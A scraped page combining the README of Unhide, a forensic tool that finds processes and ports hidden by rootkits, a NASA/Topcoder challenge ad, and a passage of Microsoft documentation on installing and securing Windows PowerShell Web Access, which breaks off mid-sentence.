Fi8sVrs

Unhide is a forensic tool to find hidden processes and TCP/UDP ports that are hidden via rootkits, LKMs, or other techniques. Linux README: **-Unhide-** http://www.unhide-forensics.info Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hiding technique. // Unhide (unhide-linux or unhide-posix) // ------------------------------------- Detecting hidden processes. Implements six main techniques 1- Compare /proc vs /bin/ps output 2- Compare info gathered from /bin/ps with info gathered by walking thru the procfs. ONLY for unhide-linux version 3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning). 4- Full PIDs space ocupation (PIDs bruteforcing). ONLY for unhide-linux version 5- Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version Reverse search, verify that all thread seen by ps are also seen in the kernel. 6- Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version It's about 20 times faster than tests 1+2+3 but maybe give more false positives. // Unhide_rb // --------- It's a back port in C language of the ruby unhide.rb As the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse" : - it makes three tests less (kill, opendir and chdir), - it only run /bin/ps once at start and once for the double check, - also, its tests are less accurate (e.g.. testing return value instead of errno), - processes are only identified by their exe link (unhide-linux also use cmdline and "sleeping kernel process" name), - there's little protection against failures (failed fopen or popen by example), - there's no logging capability. It is very quick, about 80 times quicker than "unhide-linux quick reverse" // Unhide-TCP // ---------- Identify TCP/UDP ports that are listening but not listed in sbin/ss or /bin/netstat. It use two methods: - brute force of all TCP/UDP ports availables and compare with SS/netstat output. - probe of all TCP/UDP ports not reported by netstat. // Files // ----- unhide-linux.c -- Hidden processes, for Linux >= 2.6 unhide-linux.h unhide-tcp.c -- Hidden TCP/UDP Ports unhide-tcp-fast.c unhide-tcp.h unhide-output.c -- Common routines of unhide tools unhide-output.h unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby) unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, linux 2.2 / 2.4) It doesn't implement PIDs brute forcing check yet. Needs more testing Warning : This version is somewhat outdated and may generate false positive. Prefer unhide-linux.c if you can use it. changelog -- As the name implied log of the change to unhide COPYING -- License file, GNU GPL V3 LEEME.txt -- Spanish version of this file LISEZ-MOI.TXT -- French version of this file NEWS -- Release notes README.txt -- This file sanity.sh -- unhide-linux testsuite file TODO -- Evolutions to do (any volunteers ?) man/unhide.8 -- English man page of unhide man/unhide-tcp.8 -- English man page of unhide-tcp man/fr/unhide.8 -- French man page of unhide man/fr/unhide-tcp.8 -- French man page of unhide-tcp // Compiling // --------- If you ARE using a Linux kernel >= 2.6 gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux gcc -Wall -O2 --static unhide_rb.c -o unhide_rb gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp ln -s unhide unhide-linux Else (Linux < 2.6, *BSD, Solaris and other Unice) gcc --static unhide-posix.c -o unhide-posix ln -s unhide unhide-posix // Using // ----- You MUST be root to use unhide-linux and unhide-tcp. Examples: # ./unhide-linux -vo quick reverse # ./unhide-linux -vom procall sys # ./unhide_rb # ./unhide-tcp -flov # ./unhide-tcp -flovs // License // ------- GPL V.3 (http://www.gnu.org/licenses/gpl-3.0.html) // Greets // ------ A. Ramos (aramosf@unsec.net) for some regexps unspawn (unspawn@rootshell.be) CentOS support Martin Bowers (Martin.Bowers@freescale.com) CentOS support Lorenzo Martinez (lorenzo@lorenzomartinez.homeip.net) Some ideas to improve and betatesting Francois Marier (francois@debian.org) Author of the man pages and Debian support Johan Walles (johan.walles@gmail.com) Find and fix a very nasty race condition bug Jan Iven (jan.iven@cern.ch) Because of his great improvements, new tests and bugfixing P. Gouin (patrick-g@users.sourceforge.net) Because of his incredible work fixing bugs and improving the performance François Boisson for his idea of a double check in brute test Leandro Lucarella (leandro.lucarella@sociomantic.com) for the fast scan method and his factorization work for unhide-tcp Download Linux 2012-12-29 Windows: Windows // WinUnhide Compare info gathered from wmic command with info gathered from openprocess and Toolhelp // WinUnhide-TCP First it lists open TCP/UDP ports through GetTcpTable and GetUdpTable and then identify hidden ports using bind() bruteforcing Download Windows Authored by YJesus | Site unhide-forensics.info http://packetstormsecurity.com/files/119776/Unhide-Forensic-Tool-20121229.html

NASA is hosting an out of this world Open Innovation Algorithm challenge! Think you've got the "right stuff"? Want to help power the International Space Station with YOUR innovative algorithmic solution? Watch the video and join this amazing competition that has a total prize purse of $30,000 today!!! https://www.topcoder.com/iss/challenge-details/

Updated: November 9, 2012 Applies To: Windows Server 2012 Windows PowerShell® Web Access is a new feature in Windows Server® 2012 that acts as a Windows PowerShell gateway, providing a web-based Windows PowerShell console that is targeted at a remote computer. It enables IT Pros to run Windows PowerShell commands and scripts from a Windows PowerShell console in a web browser, with no Windows PowerShell, remote management software, or browser plug-in installation necessary on the client device. All that is required to run the web-based Windows PowerShell console is a properly-configured Windows PowerShell Web Access gateway, and a client device browser that supports JavaScript® and accepts cookies. Examples of client devices include laptops, non-work personal computers, borrowed computers, tablet computers, web kiosks, computers that are not running a Windows-based operating system, and cell phone browsers. IT Pros can perform critical management tasks on remote Windows-based servers from devices that have access to an Internet connection and a web browser. After successful gateway setup and configuration, users can access a Windows PowerShell console by using a web browser. When users open the secured Windows PowerShell Web Access website, they can run a web-based Windows PowerShell console after successful authentication. Windows PowerShell Web Access setup and configuration is a three-step process: Step 1: Installing Windows PowerShell Web Access Step 2: Configuring the gateway Step 3: Configuring authorization rules and site security Before you install and configure Windows PowerShell Web Access, we recommend that you read both this topic and Use the Web-based Windows PowerShell Console, which describes how users sign in to the web-based console, and some of the limitations and differences in the console. End users of the web-based console should read Use the Web-based Windows PowerShell Console, but do not need to read this topic. This topic does not provide in-depth Web Server (IIS) operations guidance; only those steps required to configure the Windows PowerShell Web Access gateway are described in this topic. For more information about configuring and securing websites in IIS, see the IIS documentation resources in the See Also section. The following diagram shows how Windows PowerShell Web Access works. In this topic: Requirements for running Windows PowerShell Web Access Browser and client device support Step 1: Installing Windows PowerShell Web Access Step 2: Configuring the gateway Step 3: Configuring authorization rules and site security Session management Use the Web-based Windows PowerShell Console Troubleshooting access problems Uninstalling Windows PowerShell Web Access [-] Requirements for running Windows PowerShell Web Access Windows PowerShell Web Access requires Web Server (IIS), .NET Framework 4.5, and Windows PowerShell 3.0 to be running on the server on which you want to run the gateway. You can install Windows PowerShell Web Access on a server that is running Windows Server 2012 by using either the Add Roles and Features Wizard in Server Manager, or Windows PowerShell deployment cmdlets for Server Manager. When you install Windows PowerShell Web Access by using Server Manager or its deployment cmdlets, required roles and features are automatically added as part of the installation process. Windows PowerShell Web Access allows remote users to access computers in your organization by using Windows PowerShell in a web browser. Although Windows PowerShell Web Access is a convenient and powerful management tool, the web-based access poses security risks, and should be configured as securely as possible. We recommend that administrators who configure the Windows PowerShell Web Access gateway use available security layers, both the cmdlet-based authorization rules included with Windows PowerShell Web Access, and security layers that are available in Web Server (IIS) and third-party applications. This documentation includes both unsecure examples that are only recommended for test environments, as well as examples that are recommended for secure deployments. [-] Browser and client device support Windows PowerShell Web Access supports the following Internet browsers. Although mobile browsers are not officially supported, many may be able to run the web-based Windows PowerShell console. Other browsers that accept cookies, run JavaScript, and run HTTPS websites are expected to work, but are not officially tested. [-] Supported desktop computer browsers Windows® Internet Explorer® for Microsoft Windows® 8.0, 9.0, and 10.0 Mozilla Firefox® 10.0.2 Google Chrome™ 17.0.963.56m for Windows Apple Safari® 5.1.2 for Windows Apple Safari 5.1.2 for Mac OS® [-] Minimally-tested mobile devices or browsers Windows Phone 7 and 7.5 Google Android WebKit 3.1 Browser Android 2.2.1 (Kernel 2.6) Apple Safari for iPhone operating system 5.0.1 Apple Safari for iPad 2 operating system 5.0.1 [-] Browser requirements To use the Windows PowerShell Web Access web-based console, browsers must do the following. Allow cookies from the Windows PowerShell Web Access gateway website. Be able to open and read HTTPS pages. Open and run websites that use JavaScript. [-] Step 1: Installing Windows PowerShell Web Access You can install the Windows PowerShell Web Access gateway on a server that is running Windows Server 2012 by using one of the following methods. [-] To install Windows PowerShell Web Access by using the Add Roles and Features Wizard 1. If Server Manager is already open, go on to the next step. If Server Manager is not already open, open it by doing one of the following. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Windows Start screen, click Server Manager. 2. On the Manage menu, click Add Roles and Features. 3. On the Select installation type page, select Role-based or feature-based installation. Click Next. 4. On the Select destination server page, select a server from the server pool, or select an offline VHD. To select an offline VHD as your destination server, first select the server on which to mount the VHD, and then select the VHD file. For information about how to add servers to your server pool, see the Server Manager Help. After you have selected the destination server, click Next. 5. On the Select features page of the wizard, expand Windows PowerShell, and then select Windows PowerShell Web Access. 6. Note that you are prompted to add required features, such as .NET Framework 4.5, and role services of Web Server (IIS). Add required features and continue. Note .7. On the Confirm installation selections page, if the feature files for Windows PowerShell Web Access are not stored on the destination server that you selected in step 4, click Specify an alternate source path, and provide the path to the feature files. Otherwise, click Install. 8. After you click Install, the Installation progress page displays installation progress, results, and messages such as warnings, failures, or post-installation configuration steps that are required for Windows PowerShell Web Access. After Windows PowerShell Web Access is installed, you are prompted to review the readme file, which contains basic, required setup instructions for the gateway. These Step 2: Configuring the gateway are also included in this document. The path to the readme file is C:\Windows\Web\PowerShellWebAccess\wwwroot\README.txt. [-] To install Windows PowerShell Web Access by using Windows PowerShell cmdlets 1. Do one of the following to open a Windows PowerShell session with elevated user rights. On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator. On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator. Note 2. Type the following, and then press Enter, where computer_name represents a remote computer on which you want to install Windows PowerShell Web Access, if applicable. The Restart parameter automatically restarts destination servers if required. Install-WindowsFeature –Name WindowsPowerShellWebAccess -ComputerName <computer_name> -IncludeManagementTools -Restart Note To install roles and features on an offline VHD, you must add both the ComputerName parameter and the VHD parameter. The ComputerName parameter contains the name of the server on which to mount the VHD, and the VHD parameter contains the path to the VHD file on the specified server. Install-WindowsFeature –Name WindowsPowerShellWebAccess –VHD <path> -ComputerName <computer_name> -IncludeManagementTools -Restart 3. When installation is complete, verify that Windows PowerShell Web Access was installed on destination servers by running the Get-WindowsFeature cmdlet on a destination server, in a Windows PowerShell console that has been opened with elevated user rights. You can also verify that Windows PowerShell Web Access was installed in the Server Manager console, by selecting a destination server on the All Servers page, and then viewing the Roles and Features tile for the selected server. You can also view the readme file for Windows PowerShell Web Access. 4. After Windows PowerShell Web Access is installed, you are prompted to review the readme file, which contains basic, required setup instructions for the gateway. These setup instructions are also in the following section, Step 2: Configuring the gateway. The path to the readme file is C:\Windows\Web\PowerShellWebAccess\wwwroot\README.txt. [-] Step 2: Configuring the gateway The Install-PswaWebApplication cmdlet is a quick way to get Windows PowerShell Web Access configured. Although you can add the UseTestCertificate parameter to the Install-PswaWebApplication cmdlet to install a self-signed SSL certificate for test purposes, this is not secure; for a secure production environment, always use a valid SSL certificate that has been signed by a certification authority (CA). Administrators can replace the test certificate with a signed certificate of their choice by using the IIS Manager console. You can complete Windows PowerShell Web Access web application configuration either by running the Install-PswaWebApplication cmdlet or by performing GUI-based configuration steps in IIS Manager. By default, the cmdlet installs the web application, pswa (and an application pool for it, pswa_pool), in the Default Web Site container, as shown in IIS Manager; if desired, you can instruct the cmdlet to change the default site container of the web application. IIS Manager offers configuration options that are available for web applications, such as changing the port number or the Secure Sockets Layer (SSL) certificate. Security Note [-] Configuring the gateway by using Install-PswaWebApplication Follow these instructions to configure the Windows PowerShell Web Access gateway by using the Install-PswaWebApplication cmdlet. [-] To configure the Windows PowerShell Web Access gateway with a test certificate by using Install-PswaWebApplication 1. Do one of the following to open a Windows PowerShell session. On the Windows desktop, right-click Windows PowerShell on the taskbar. On the Windows Start screen, click Windows PowerShell. 2. Type the following, and then press Enter. Install-PswaWebApplication -UseTestCertificate Security Note The following settings are configured by running the cmdlet. You can change these manually in the IIS Manager console, if desired. Path: /pswa ApplicationPool: pswa_pool EnabledProtocols: http PhysicalPath: %windir%/Web/PowerShellWebAccess/wwwroot Example: Install-PswaWebApplication –webApplicationName myWebApp –useTestCertificateIn this example, the resulting website for Windows PowerShell Web Access is https://< server_name>/myWebApp. Note [-] To configure the Windows PowerShell Web Access gateway with a genuine certificate by using Install-PswaWebApplication 1. Do one of the following to open a Windows PowerShell session. On the Windows desktop, right-click Windows PowerShell on the taskbar. On the Windows Start screen, click Windows PowerShell. 2. Type the following, and then press Enter. Install-PswaWebApplication The following gateway settings are configured by running the cmdlet. You can change these manually in the IIS Manager console, if desired. You can also specify values for the WebsiteName and WebApplicationName parameters of the Install-PswaWebApplication cmdlet. Path: /pswa ApplicationPool: pswa_pool EnabledProtocols: http PhysicalPath: %windir%/Web/PowerShellWebAccess/wwwroot 3. Open the IIS Manager console by doing one of the following. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager. On the Windows Start screen, click Server Manager. 4. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Expand the Sites folder. 5. Select the website in which you have installed the Windows PowerShell Web Access web application. In the Actions pane, click Bindings. 6. In the Site Binding dialog box, click Add. 7. In the Add Site Binding dialog box, in the Type field, select https. 8. In the SSL certificate field, select your signed certificate from the drop-down menu. Click OK. See To configure an SSL certificate in IIS Manager in this topic for more information about how to obtain a certificate. The Windows PowerShell Web Access web application is now configured to use your signed SSL certificate. You can access Windows PowerShell Web Access by opening https://<server_name>/pswa in a browser window. Note [-] Configuring the gateway by using IIS Manager Instructions in this section are for installing the Windows PowerShell Web Access web application in a subdirectory—and not in the root directory—of your website. This procedure is the GUI-based equivalent of the actions performed by the Install-PswaWebApplication cmdlet. This section also includes instructions for how to use IIS Manager to configure the Windows PowerShell Web Access gateway as a root website. [-] To use IIS Manager to configure the gateway in an existing website 1. Open the IIS Manager console by doing one of the following. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager. On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results. 2. Create a new application pool for Windows PowerShell Web Access. Expand the node of the gateway server in the IIS Manager tree pane, select Application Pools, and click Add Application Pool in the Actions pane. 3. Add a new application pool with the name pswa_pool, or provide another name. Click OK. 4. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Select the Sites folder. 5. Right-click the website (for example, Default Web Site) to which you would like to add the Windows PowerShell Web Access website, and then click Add Application. 6. In the Alias field, type pswa, or provide another alias. The alias becomes the virtual directory name. For example, pswa in the following URL represents the alias specified in this step: https://<server_name>/pswa.'>https://<server_name>/pswa. 7. In the Application pool field, select the application pool that you created in step 3. 8. In the Physical path field, browse for the location of the application. You can use the default location, %windir%/Web/PowerShellWebAccess/wwwroot. Click OK. 9. Follow the steps in the procedure To configure an SSL certificate in IIS Manager in this topic. 10. Optional security step: With the website selected in the tree pane, double-click SSL Settings in the content pane. Select Require SSL, and then in the Actions pane, click Apply. Optionally, in the SSL Settings pane, you can require that users connecting to the Windows PowerShell Web Access website have client certificates. Client certificates help to verify the identity of a client device user. For more information about how requiring client certificates can increase the security of Windows PowerShell Web Access, see Security in this topic. 11. Open a browser session on a client device. For more information about supported browsers and devices, see Browser and client device support in this document. 12. Open the new Windows PowerShell Web Access website, https://< gateway_server_name>/pswa. The browser should display the Windows PowerShell Web Access console sign-in page. Note 13. In a Windows PowerShell session that has been opened with elevated user rights (Run as Administrator), run the following script, in which application_pool_name represents the name of the application pool that you created in step 3, to give the application pool access rights to the authorization file. $applicationPoolName = "<application_pool_name>" $authorizationFile = "C:\windows\web\powershellwebaccess\data\AuthorizationRules.xml" c:\windows\system32\icacls.exe $authorizationFile /grant ('"' + "IIS AppPool\$applicationPoolName" + '":R') > $null To view existing access rights on the authorization file, run the following command: c:\windows\system32\icacls.exe $authorizationFile [-] To use IIS Manager to configure the Windows PowerShell Web Access gateway as a root website with a test certificate 1. Open the IIS Manager console by doing one of the following. On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager. On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results. 2. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Select the Sites folder. 3. In the Actions pane, click Add Website. 4. Type a name for the website, such as Windows PowerShell Web Access. 5. An application pool is automatically created for the new website. To use a different application pool, click Select to select an application pool to associate with the new website. Select the alternate application pool in the Select Application Pool dialog box, and then click OK. 6. In the Physical path text box, navigate to %windir%/Web/PowerShellWebAccess/wwwroot. 7. In the Type field of the Binding area, select https. 8. Assign a port number to the website that is not already in use by another site or application. To locate open ports, you can run the netstat command in a Command Prompt window. The default port number is 443. Change the default port if another website is already using 443, or if you have other security reasons for changing the port number. If another website that is running on your gateway server is using your selected port, a warning is displayed when you click OK in the Add Website dialog box. You must use an unused port to run Windows PowerShell Web Access. 9. Optionally, if needed for your organization, specify a host name that makes sense to your organization and users, such as Microsoft România | Dispozitive ?i servicii. Click OK. 10. For a more secure production environment, we strongly recommend providing a valid certificate that has been signed by a CA. You must provide an SSL certificate, because users can only connect to Windows PowerShell Web Access through an HTTPS website. See To configure an SSL certificate in IIS Manager in this topic for more information about how to obtain a certificate. 11. Click OK to close the Add Website dialog box. 12. In a Windows PowerShell session that has been opened with elevated user rights (Run as Administrator), run the following script, in which application_pool_name represents the name of the application pool that you created in step 4, to give the application pool access rights to the authorization file. $applicationPoolName = "<application_pool_name>" $authorizationFile = "C:\windows\web\powershellwebaccess\data\AuthorizationRules.xml" c:\windows\system32\icacls.exe $authorizationFile /grant ('"' + "IIS AppPool\$applicationPoolName" + '":R') > $null To view existing access rights on the authorization file, run the following command: c:\windows\system32\icacls.exe $authorizationFile 13. With the new website selected in the IIS Manager tree pane, click Start in the Actions pane to start the website. 14. Open a browser session on a client device. For more information about supported browsers and devices, see Browser and client device support in this document. 15. Open the new Windows PowerShell Web Access website. Because the root website points to the Windows PowerShell Web Access folder, the browser should display the Windows PowerShell Web Access sign-in page when you open https://< gateway_server_name>. You should not need to add /pswa to the URL. Note [-] To configure an SSL certificate in IIS Manager 1. In the IIS Manager tree pane, select the server on which Windows PowerShell Web Access is installed. 2. In the content pane, double click Server Certificates. 3. In the Actions pane, do one of the following. For more information about configuring server certificates in IIS, see Configuring Server Certificates in IIS 7. Click Import to import an existing, valid certificate from a location on your network. Click Create Certificate Request to request a certificate from a CA such as VeriSign™, Thawte, or GeoTrust®. The certificate's common name must match the host header in the request. For example, if the client browser requests Microsoft România | Dispozitive ?i servicii, then the common name must also be Microsoft România | Dispozitive ?i servicii. This is the most secure and recommended option for providing the Windows PowerShell Web Access gateway with a certificate. Click Create a Self-Signed Certificate to create a certificate that you can use immediately, and have signed later by a CA if desired. Specify a friendly name for the self-signed certificate, such as Windows PowerShell Web Access. This option is not considered secure, and is recommended only for a private test environment. 4. After creating or obtaining a certificate, select the website to which the certificate is applied (for example, Default Web Site) in the IIS Manager tree pane, and then click Bindings in the Actions pane. 5. In the Add Site Binding dialog box, add an https binding for the site, if one is not already displayed. If you are not using a self-signed certificate, specify the host name from step 3 of this procedure. If you are using a self-signed certificate, this step is not required. 6. Select the certificate that you obtained or created in step 3 of this procedure, and then click OK. [-] Step 3: Configuring authorization rules and site security After Windows PowerShell Web Access is installed and the gateway is configured, users can open the sign-in page in a browser, but they cannot sign in until the Windows PowerShell Web Access administrator grants users access explicitly. Windows PowerShell Web Access access control is managed by using the set of Windows PowerShell cmdlets described in the following table. There is no comparable GUI for adding or managing authorization rules. For more detailed information about Windows PowerShell Web Access cmdlets, see the cmdlet Help topics linked to in the following table, or see the parent topic, Windows PowerShell Web Access Cmdlets. Administrators can define 0-n authentication rules for Windows PowerShell Web Access. The default security is restrictive rather than permissive; zero authentication rules means no users have access to anything. Windows PowerShell Web Access authentication rules are whitelist rules. Each rule is a definition of an allowed connection between users, target computers, and particular Windows PowerShell session configurations (also referred to as endpoints or runspaces) on specified target computers. Security Note [table=width: 650, class: grid, align: center] [tr] [td]Name[/td] [td]Description[/td] [td]Parameters[/td] [/tr] [tr] [td]Add-PswaAuthorizationRule[/td] [td]Adds a new authorization rule to the Windows PowerShell Web Access authorization rule set.[/td] [td] ComputerGroupName ComputerName ConfigurationName RuleName UserGroupName UserName [/td] [/tr] [tr] [td]Remove-PswaAuthorizationRule[/td] [td]Removes a specified authorization rule from Windows PowerShell Web Access.[/td] [td] Id RuleName [/td] [/tr] [tr] [td]Get-PswaAuthorizationRule[/td] [td]Returns a set of Windows PowerShell Web Access authorization rules. When it is used without parameters, the cmdlet returns all rules.[/td] [td] Id RuleName [/td] [/tr] [tr] [td]Test-PswaAuthorizationRule[/td] [td]Evaluates authorization rules to determine if a specific user, computer, or session configuration access request is authorized. By default, if no parameters are added, the cmdlet evaluates all authorization rules. By adding parameters, administrators can specify an authorization rule or a subset of rules to test.[/td] [td] ComputerName ConfigurationName RuleName UserName [/td] [/tr] [/table] The preceding cmdlets create a set of access rules which are used to authorize a user on the Windows PowerShell Web Access gateway. The rules are different from the access control lists (ACLs) on the destination computer, and provide an additional layer of security for web access. More details about security are described in the following section. If users cannot pass any of the preceding security layers, they receive a generic “access denied” message in their browser windows. Although security details are logged on the gateway server, end users are not shown information about how many security layers they passed, or at which layer the sign-in or authentication failure occurred. For more information about configuring authorization rules, see Configuring authorization rules in this topic. [-] Security The Windows PowerShell Web Access security model has four layers between an end user of the web-based console, and a target computer. Windows PowerShell Web Access administrators can add security layers through additional configuration in the IIS Manager console. For more information about securing websites in the IIS Manager console, see Configure Web Server Security (IIS 7). For more information about IIS best practices and preventing denial-of-service attacks, see Best Practices for Preventing DoS/Denial of Service Attacks. An administrator can also buy and install additional, retail authentication software. The following table describes the four layers of security between end users and target computers. [table=width: 700, class: grid, align: center] [tr] [td]Order[/td] [td]Layer[/td] [td]Description[/td] [/tr] [tr] [td]1[/td] [td]Web Server (IIS) security features, such as client certificate authentication[/td] [td]indows PowerShell Web Access users must always provide a user name and password to authenticate their accounts on the gateway. However, Windows PowerShell Web Access administrators can also turn optional client certificate authentication on or off (see step 10 of To use IIS Manager to configure the gateway in an existing website in this document). The optional client certificate feature requires end users to have a valid client certificate, in addition to their user names and passwords, and is part of Web Server (IIS) configuration. When the client certificate layer is enabled, the Windows PowerShell Web Access sign-in page prompts users to provide valid certificates before their sign-in credentials are evaluated. Client certificate authentication automatically checks for the client certificate. If a valid certificate is not found, Windows PowerShell Web Access informs users, so they can provide the certificate. If a valid client certificate is found, Windows PowerShell Web Access opens the sign-in page for users to provide their user names and passwords. This is one example of additional security settings that are offered by Web Server (IIS). For more information about other IIS security features, see Configure Web Server Security (IIS 7).[/td] [/tr] [tr] [td]2[/td] [td]Windows PowerShell Web Access forms-based gateway authentication[/td] [td]The Windows PowerShell Web Access sign-in page requires a set of credentials (user name and password) and offers users the option of providing different credentials for the target computer. If the user does not provide alternate credentials, the primary user name and password that are used to connect to the gateway are also used to connect to the target computer. The required credentials are authenticated on the Windows PowerShell Web Access gateway. These credentials must be valid user accounts on either the local Windows PowerShell Web Access gateway server, or in Active Directory®. After a user is authenticated at the gateway, Windows PowerShell Web Access checks authorization rules to verify if the user has access to the requested target computer. After successful authorization, the user’s credentials are passed along to the target computer.[/td] [/tr] [tr] [td]3[/td] [td]Windows PowerShell Web Access authorization rules[/td] [td]After a user is authenticated at the gateway, Windows PowerShell Web Access checks authorization rules to verify if the user has access to the requested target computer. After successful authorization, the user’s credentials are passed along to the target computer. These rules are evaluated only after a user has been authenticated by the gateway, and before a user can be authenticated on a target computer.[/td] [/tr] [tr] [td]4[/td] [td]Target authentication and authorization rules[/td] [td]The final layer of security for Windows PowerShell Web Access is the target computer’s own security configuration. Users must have the appropriate access rights configured on the target computer, and also in the Windows PowerShell Web Access authorization rules, to run a Windows PowerShell web-based console that affects a target computer through Windows PowerShell Web Access. This layer offers the same security mechanisms that would evaluate connection attempts if users tried to create a remote Windows PowerShell session to a target computer from within Windows PowerShell by running the Enter-PSSession or New-PSSession cmdlets. By default, Windows PowerShell Web Access uses the primary user name and password for authentication on both the gateway and the target computer. The web-based sign-in page, in a section titled Optional connection settings, offers users the option of providing different credentials for the target computer, if they are required. If the user does not provide alternate credentials, the primary user name and password that are used to connect to the gateway are also used to connect to the target computer. Authorization rules can be used to allow users access to a particular session configuration. You can create restricted runspaces or session configurations for Windows PowerShell Web Access, and allow specific users to connect only to specific session configurations when they sign in to Windows PowerShell Web Access. You can use access control lists (ACLs) to determine which users have access to specific endpoints, and further restrict access to the endpoint for a specific set of users by using authorization rules described in this section. For more information about restricted runspaces, see Constrained Runspaces on MSDN.[/td] [/tr] [/table] [-] Configuring authorization rules Administrators likely want the same authorization rule for Windows PowerShell Web Access users that is already defined in their environment for Windows PowerShell remote management. The first procedure in this section describes how to add a secure authorization rule that grants access to one user, signing in to manage one computer, and within a single session configuration. The second procedure describes how to remove an authorization rule that is no longer needed. If you plan to use custom session configurations to allow specific users to work only within restricted runspaces in Windows PowerShell Web Access, create your custom session configurations before you add authorization rules that refer to them. You cannot use the Windows PowerShell Web Access cmdlets to create custom session configurations. For more information about creating custom session configurations, see about_Session_Configuration_Files on MSDN. Windows PowerShell Web Access cmdlets support one wildcard character, an asterisk ( * ). Wildcard characters within strings are not supported; use a single asterisk per property (users, computers, or session configurations). [-] To add a restrictive authorization rule 1. Do one of the following to open a Windows PowerShell session with elevated user rights. On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator. On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator. 2. Optional step for restricting user access by using session configurations: Verify that session configurations that you want to use in your rules already exist. If they have not yet been created, use instructions for creating session configurations in about_Session_Configuration_Files on MSDN. 3. Type the following, and then press Enter. Add-PswaAuthorizationRule –UserName <domain\user | computer\user> -ComputerName <computer_name> -ConfigurationName <session_configuration_name> This authorization rule allows a specific user access to one computer on the network to which they typically have access, with access to a specific session configuration that is scoped to the user’s typical scripting and cmdlet needs. In the following example, a user named JSmith in the Contoso domain is granted access to manage the computer Contoso_214, and use a session configuration named NewAdminsOnly. 4. Add-PswaAuthorizationRule –UserName Contoso\JSmith -ComputerName Contoso_214 -ConfigurationName NewAdminsOnly Verify that the rule has been created by running the Get-PswaAuthorizationRule cmdlet. Note [-] To remove an authorization rule 1. If a Windows PowerShell session is not already open, see step 1 of To add a nonrestrictive authorization rule in this section. 2. Type the following, and then press Enter, where rule ID represents the unique ID number of the rule that you want to remove. Remove-PswaAuthorizationRule -ID <rule ID> Alternatively, if you do not know the ID number, but know the friendly name of the rule you want to remove, you can get the name of the rule, and pipe it to the Remove-PswaAuthorizationRule cmdlet to remove the rule, as shown in the following example: Get-PswaAuthorizationRule -RuleName <rule name> | Remove-PswaAuthorizationRule. Note [-] Other authorization rule scenario examples Every Windows PowerShell session uses a session configuration; if one is not specified for a session, Windows PowerShell uses the default, built-in Windows PowerShell session configuration, called Microsoft.PowerShell. The default session configuration includes all cmdlets that are available on a computer. Administrators can restrict access to all computers by defining a session configuration with a restricted runspace (a limited range of cmdlets and tasks that their end users could perform). A user who is granted access to one computer with either full language access or only the Windows PowerShell remote management cmdlets can connect to other computers that are connected to the first computer. Defining a restricted runspace can prevent users from accessing other computers from their allowed Windows PowerShell runspace, and improves the security of your Windows PowerShell Web Access environment. The session configuration can be distributed (by using Group Policy) to all computers that administrators want to make accessible through Windows PowerShell Web Access. For more information about session configurations, see about_Session_Configurations. The following are some examples of this scenario. An administrator creates an endpoint, called PswaEndpoint, with a restricted runspace. Then, the administrator creates a rule, *,*,PswaEndpoint, and distributes the endpoint to other computers. The rule allows all users to access all computers with the endpoint PswaEndpoint. If this is the only authorization rule defined in the rule set, computers without that endpoint would not be accessible. The administrator created an endpoint with a restricted runspace called PswaEndpoint,and wants to restrict access to specific users. The administrator creates a group of users called Level1Support, and defines the following rule: Level1Support,*,PswaEndpoint. The rule grants any users in the group Level1Support access to all computers with the PswaEndpoint configuration. Similarly, access can be restricted to a specific set of computers. Some administrators provide certain users more access than others. For example, an administrator creates two user groups, Admins and BasicSupport. The administrator also creates an endpoint with a restricted runspace called PswaEndpoint, and defines the following two rules: Admins,*,* and BasicSupport,*,PswaEndpoint. The first rule provides all users in the Admin group access to all computers, and the second rule provides all users in the BasicSupport group access only to those computers with PswaEndpoint. An administrator has set up a private test environment, and wants to allow all authorized network users access to all computers on the network to which they typically have access, with access to all session configurations to which they typically have access. Because this is a private test environment, the administrator creates an authorization rule that is not secure. The administrator runs the cmdlet Add-PswaAuthorizationRule * * *, which uses the wildcard character * to represent all users, all computers, and all configurations. This rule is the equivalent of the following: Add-PswaAuthorizationRule –UserName * -ComputerName * -ConfigurationName *. Security Note An administrator must allow users to connect to target computers in an environment that includes both workgroups and domains, where workgroup computers are occasionally used to connect to target computers in domains, and computers in domains are occasionally used to connect to target computers in workgroups. The administrator has a gateway server, PswaServer, in a workgroup; and target computer srv1.contoso.com is in a domain. User Chris is an authorized local user on both the workgroup gateway server and the target computer. His user name on the workgroup server is chrisLocal; and his user name on the target computer is contoso\chris. To authorize access to srv1.contoso.com for Chris, the administrator adds the following rule. Add-PswaAuthorizationRule –userName PswaServer\chrisLocal –computerName srv1.contoso.com –configurationName Microsoft.PowerShell The preceding rule example authenticates Chris on the gateway server, and then authorizes his access to srv1. On the sign-in page, Chris must provide a second set of credentials in the Optional connection settings area (contoso\chris). The gateway server uses the additional set of credentials to authenticate him on the target computer, srv1.contoso.com. In the preceding scenario, Windows PowerShell Web Access establishes a successful connection to the target computer only after the following have been 